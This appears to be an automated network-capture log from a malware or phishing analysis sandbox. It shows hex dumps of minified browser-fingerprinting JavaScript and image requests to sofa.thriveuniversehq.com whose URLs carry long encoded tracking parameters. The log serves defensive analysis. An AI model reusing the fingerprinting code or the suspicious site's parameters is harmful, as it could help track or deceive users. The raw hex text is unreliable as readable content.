                                                          2023-11-27 03:23:50 UTC1369INData Raw: 3a 5b 5d 7d 3b 72 65 74 75 72 6e 20 6f 3d 7b 6e 65 78 74 3a 63 28 30 29 2c 74 68 72 6f 77 3a 63 28 31 29 2c 72 65 74 75 72 6e 3a 63 28 32 29 7d 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 6f 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 2c 6f 3b 66 75 6e 63 74 69 6f 6e 20 63 28 6f 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6e 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 69 3b 29 74 72 79 7b 69 66 28 6e 3d 31 2c 72
                                                          Data Ascii: :[]};return o={next:c(0),throw:c(1),return:c(2)},"function"==typeof Symbol&&(o[Symbol.iterator]=function(){return this}),o;function c(o){return function(c){return function(o){if(n)throw new TypeError("Generator is already executing.");for(;i;)try{if(n=1,r
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 74 28 21 31 2c 61 29 7d 76 61 72 20 72 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 2c 61 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 61 26 26 28 61 3d 31 36 29 2c 6e 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 69 2c 63 3b 72 65 74 75 72 6e 20 72 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 73 77 69 74 63 68 28 72 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 6e 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 69 3d 30 2c 72 2e 6c 61 62 65 6c 3d 31 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 69 3c 65 2e 6c 65 6e 67 74 68 3f 28 74 28 65 5b 69 5d 2c 69 29 2c 28 63 3d 44 61 74 65 2e 6e 6f 77 28 29 29 3e 3d 6e 2b 61 3f 28 6e 3d 63 2c 5b 34 2c 6f 28 30 29 5d 29 3a 5b 33 2c 33 5d 29
                                                          Data Ascii: t(!1,a)}var r}function c(e,t,a){return void 0===a&&(a=16),n(this,void 0,void 0,(function(){var n,i,c;return r(this,(function(r){switch(r.label){case 0:n=Date.now(),i=0,r.label=1;case 1:return i<e.length?(t(e[i],i),(c=Date.now())>=n+a?(n=c,[4,o(0)]):[3,3])
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 5d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 65 5b 30 5d 5e 74 5b 30 5d 2c 65 5b 31 5d 5e 74 5b 31 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 66 28 65 2c 5b 30 2c 65 5b 30 5d 3e 3e 3e 31 5d 29 2c 65 3d 66 28 65 3d 73 28 65 2c 5b 34 32 38 33 35 34 33 35 31 31 2c 33 39 38 31 38 30 36 37 39 37 5d 29 2c 5b 30 2c 65 5b 30 5d 3e 3e 3e 31 5d 29 2c 65 3d 66 28 65 3d 73 28 65 2c 5b 33 33 30 31 38 38 32 33 36 36 2c 34 34 34 39 38 34 34 30 33 5d 29 2c 5b 30 2c 65 5b 30 5d 3e 3e 3e 31 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 74 3d 74 7c 7c 30 3b 76 61 72 20 6e 2c 72 3d 28 65 3d 65 7c 7c 22 22 29 2e 6c 65 6e 67 74 68 25 31 36 2c 61 3d 65 2e 6c 65 6e 67 74 68 2d 72 2c 6f 3d 5b 30 2c 74 5d
                                                          Data Ascii: ]}function f(e,t){return[e[0]^t[0],e[1]^t[1]]}function h(e){return e=f(e,[0,e[0]>>>1]),e=f(e=s(e,[4283543511,3981806797]),[0,e[0]>>>1]),e=f(e=s(e,[3301882366,444984403]),[0,e[0]>>>1])}function v(e,t){t=t||0;var n,r=(e=e||"").length%16,a=e.length-r,o=[0,t]
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 5d 2c 34 38 29 29 3b 63 61 73 65 20 36 3a 63 3d 66 28 63 2c 64 28 5b 30 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 2b 35 29 5d 2c 34 30 29 29 3b 63 61 73 65 20 35 3a 63 3d 66 28 63 2c 64 28 5b 30 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 2b 34 29 5d 2c 33 32 29 29 3b 63 61 73 65 20 34 3a 63 3d 66 28 63 2c 64 28 5b 30 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 2b 33 29 5d 2c 32 34 29 29 3b 63 61 73 65 20 33 3a 63 3d 66 28 63 2c 64 28 5b 30 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 2b 32 29 5d 2c 31 36 29 29 3b 63 61 73 65 20 32 3a 63 3d 66 28 63 2c 64 28 5b 30 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 2b 31 29 5d 2c 38 29 29 3b 63 61 73 65 20 31 3a 63 3d 73 28 63 3d 66 28 63 2c 5b 30 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 29 5d 29 2c 70
                                                          Data Ascii: ],48));case 6:c=f(c,d([0,e.charCodeAt(n+5)],40));case 5:c=f(c,d([0,e.charCodeAt(n+4)],32));case 4:c=f(c,d([0,e.charCodeAt(n+3)],24));case 3:c=f(c,d([0,e.charCodeAt(n+2)],16));case 2:c=f(c,d([0,e.charCodeAt(n+1)],8));case 1:c=s(c=f(c,[0,e.charCodeAt(n)]),p
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 7b 65 72 72 6f 72 3a 79 28 65 5b 31 5d 29 2c 64 75 72 61 74 69 6f 6e 3a 6f 7d 7d 29 29 3b 76 61 72 20 63 3d 65 5b 31 5d 3b 69 66 28 6e 28 63 29 29 72 65 74 75 72 6e 20 72 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 63 2c 64 75 72 61 74 69 6f 6e 3a 6f 7d 7d 29 29 3b 72 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 69 28 63 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 5b 5d 2c 72 3d 30 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 76 61 72 20 61 3d 6f 2b 44 61
                                                          Data Ascii: ){return{error:y(e[1]),duration:o}}));var c=e[1];if(n(c))return r((function(){return{value:c,duration:o}}));r((function(){return new Promise((function(e){var t=Date.now();i(c,(function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];var a=o+Da
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 28 5b 22 77 65 62 6b 69 74 50 65 72 73 69 73 74 65 6e 74 53 74 6f 72 61 67 65 22 69 6e 20 74 2c 22 77 65 62 6b 69 74 54 65 6d 70 6f 72 61 72 79 53 74 6f 72 61 67 65 22 69 6e 20 74 2c 30 3d 3d 3d 74 2e 76 65 6e 64 6f 72 2e 69 6e 64 65 78 4f 66 28 22 47 6f 6f 67 6c 65 22 29 2c 22 77 65 62 6b 69 74 52 65 73 6f 6c 76 65 4c 6f 63 61 6c 46 69 6c 65 53 79 73 74 65 6d 55 52 4c 22 69 6e 20 65 2c 22 42 61 74 74 65 72 79 4d 61 6e 61 67 65 72 22 69 6e 20 65 2c 22 77 65 62 6b 69 74 4d 65 64 69 61 53 74 72 65 61 6d 22 69 6e 20 65 2c 22 77 65 62 6b 69 74 53 70 65 65 63 68 47 72 61 6d 6d 61 72 22 69 6e 20 65 5d 29 3e 3d 35 7d 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2c 74 3d 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 62 28 5b 22
                                                          Data Ascii: (["webkitPersistentStorage"in t,"webkitTemporaryStorage"in t,0===t.vendor.indexOf("Google"),"webkitResolveLocalFileSystemURL"in e,"BatteryManager"in e,"webkitMediaStream"in e,"webkitSpeechGrammar"in e])>=5}function x(){var e=window,t=navigator;return b(["
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 33 5d 3a 5b 34 2c 6f 28 61 29 5d 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 72 2e 73 65 6e 74 28 29 2c 5b 33 2c 31 5d 3b 63 61 73 65 20 33 3a 73 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 2c 72 2e 6c 61 62 65 6c 3d 34 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 72 2e 74 72 79 73 2e 70 75 73 68 28 5b 34 2c 2c 31 30 2c 31 31 5d 29 2c 5b 34 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 61 72 20 61 3d 21 31 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 3d 21 30 2c 65 28 29 7d 3b 73 2e 6f 6e 6c 6f 61 64 3d 6f 2c 73 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 3d 21 30 2c 72 28 65 29 7d 3b 76 61 72 20 69 3d 73 2e 73 74 79 6c 65 3b 69 2e 73 65 74 50 72 6f 70 65 72
                                                          Data Ascii: 3]:[4,o(a)];case 2:return r.sent(),[3,1];case 3:s=n.createElement("iframe"),r.label=4;case 4:return r.trys.push([4,,10,11]),[4,new Promise((function(e,r){var a=!1,o=function(){a=!0,e()};s.onload=o,s.onerror=function(e){a=!0,r(e)};var i=s.style;i.setProper
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 72 29 3b 75 28 64 5b 31 5d 2c 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 64 5b 34 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 64 5b 35 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 22 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 72 29 7d 7d 72 65 74 75 72 6e 5b 6f 2c 69 5d 7d 28 65 29 2c 6e 3d 74 5b 30 5d 2c 72 3d 74 5b 31 5d 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6e 75 6c 6c 21 3d 6e 3f 6e 3a 22 64 69 76 22 29 2c 6f 3d 30 2c 69 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 3b 6f 3c 69 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 76 61 72 20 63 3d 69 5b 6f 5d 2c 75 3d 72 5b 63 5d 2e 6a 6f 69 6e 28 22 20 22 29 3b 22 73 74 79 6c 65 22 3d 3d 3d
                                                          Data Ascii: r);u(d[1],null!==(n=null!==(t=d[4])&&void 0!==t?t:d[5])&&void 0!==n?n:"");break;default:throw new Error(r)}}return[o,i]}(e),n=t[0],r=t[1],a=document.createElement(null!=n?n:"div"),o=0,i=Object.keys(r);o<i.length;o++){var c=i[o],u=r[c].join(" ");"style"===


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.549740104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC3715OUTGET /people/5.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC702INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 35 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 34 65 32 2d 36 30 38 39 30 32 66 63 34 65 61 64 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 33 38 39 34
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: image/jpegContent-Length: 1250Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "4e2-608902fc4eadd"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 3894
                                                          2023-11-27 03:23:50 UTC667INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 10 0b 0b 0b 0c 0b 10 0c 0c 10 17 0f 0d 0f 17 1b 14 10 10 14 1b 1f 17 17 17 17 17 1f 1e 17 1a 1a 1a 1a 17 1e 1e 23 25 27 25 23 1e 2f 2f 33 33 2f 2f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 01 11 0f 0f 11 13 11 15 12 12 15 14 11 14 11 14 1a 14 16 16 14 1a 26 1a 1a 1c 1a 1a 26 30 23 1e 1e 1e 1e 23 30 2b 2e 27 27 27 2e 2b 35 35 30 30 35 35 40 40 3f 40 40 40 40 40 40 40 40 40 40 40 40 ff c0 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 8b 00 00 03 01 01 00 03 00 00 00 00 00 00 00 00 00 00 00 05 06 04 03 01 02 07 01 01 01 01 01 01 00 00 00 00
                                                          Data Ascii: ExifII*DuckyAdobed#%'%#//33//@@@@@@@@@@@@@@@&&0##0+.'''.+550055@@?@@@@@@@@@@@@22"
                                                          2023-11-27 03:23:50 UTC583INData Raw: 6f 10 d9 48 a9 6d c7 0d 7c 6f 16 39 83 40 48 02 45 bf 57 91 85 e9 be 0f cc ac 62 5c 5c cc 71 92 d1 70 49 95 8a 92 3f 30 15 30 f1 d0 f4 d1 d7 32 b9 30 ef e2 08 f0 a2 58 a3 09 24 93 11 cc a2 dc ea a3 d2 3f 75 3b d8 cc 6f b6 19 73 08 8d 22 e4 76 63 70 58 a5 f9 6d df 52 5b d6 eb 36 e7 b9 1c 82 39 23 8b d0 85 06 8a 07 e3 4c d3 70 69 36 b5 8e 55 ba a0 24 a6 bc 10 8d 34 b7 13 55 1c 19 d9 a6 de 87 b9 bb ce df 98 ed 93 15 d8 1e 17 95 14 00 dd 96 36 26 dc 2b 94 3b 9e 32 cd e9 c6 a1 17 87 2d c2 b1 36 d4 5b b2 a5 5d b3 32 9c c3 0a 59 17 d2 29 6e 5b 03 a5 71 53 9c aa 5d 55 84 48 de 94 a0 12 bf 6d 30 44 22 c7 e3 31 bf e7 6e ff 00 fa fd 8a 29 07 c7 fe 6f 52 fa 0d 7f 0a 28 ed 47 76 a3 24 99 f8 e6 25 c5 2a c1 fb 58 81 ca cc 4d eb 98 33 c8 e4 c6 39 4d ac 79 7e ca e9 b6 60
                                                          Data Ascii: oHm|o9@HEWb\\qpI?0020X$?u;os"vcpXmR[69#Lpi6U$4U6&+;2-6[]2Y)n[qS]UHm0D"1n)oR(Gv$%*XM39My~`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.549741104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC3715OUTGET /people/3.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm